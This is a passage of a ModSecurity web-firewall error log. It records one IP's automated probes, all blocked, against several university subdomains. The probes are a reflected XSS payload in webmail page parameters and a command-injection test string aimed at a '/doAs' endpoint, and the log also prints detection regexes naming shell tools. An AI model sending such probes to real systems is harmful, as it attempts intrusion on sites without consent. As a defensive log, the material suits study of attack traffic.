"OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdeQ08AAAAQ"]
[Tue Aug 29 11:42:23.390279 2023] [:error] [pid 1898] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdqbFEAAAAR"]
[Tue Aug 29 11:42:23.407215 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdQ3gQAAAAV"]
[Tue Aug 29 11:42:23.408295 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAQSWzsAAAA0"]
[Tue Aug 29 11:42:23.409576 2023] [:error] [pid 1898] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdqbFIAAAAR"]
[Tue Aug 29 11:42:24.377799 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdrEmIAAAAn"]
[Tue Aug 29 11:42:24.396814 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdlvawAAAAl"]
[Tue Aug 29 11:42:24.406973 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAddJrkAAAAh"]
[Tue Aug 29 11:42:24.408671 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdOeQoAAAAS"]
[Tue Aug 29 11:42:24.410788 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdi9@0AAAAk"]
[Tue Aug 29 11:42:25.359885 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdrEmMAAAAn"]
[Tue Aug 29 11:42:25.375471 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAc-51AAAAAN"]
[Tue Aug 29 11:42:25.385478 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAbo-cUAAAAi"]
[Tue Aug 29 11:42:25.387263 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAc92xoAAAAD"]
[Tue Aug 29 11:42:25.409551 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdV7bIAAAAa"]
[Tue Aug 29 11:42:26.375693 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdrEmYAAAAn"]
[Tue Aug 29 11:42:26.401519 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdeQ1cAAAAQ"]
[Tue Aug 29 11:42:26.420468 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAbo-cgAAAAi"]
[Tue Aug 29 11:42:26.427111 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdi9-EAAAAk"]
[Tue Aug 29 11:42:26.460236 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdZZrAAAAAf"]
[Tue Aug 29 11:42:27.360503 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdSZL0AAAAX"]
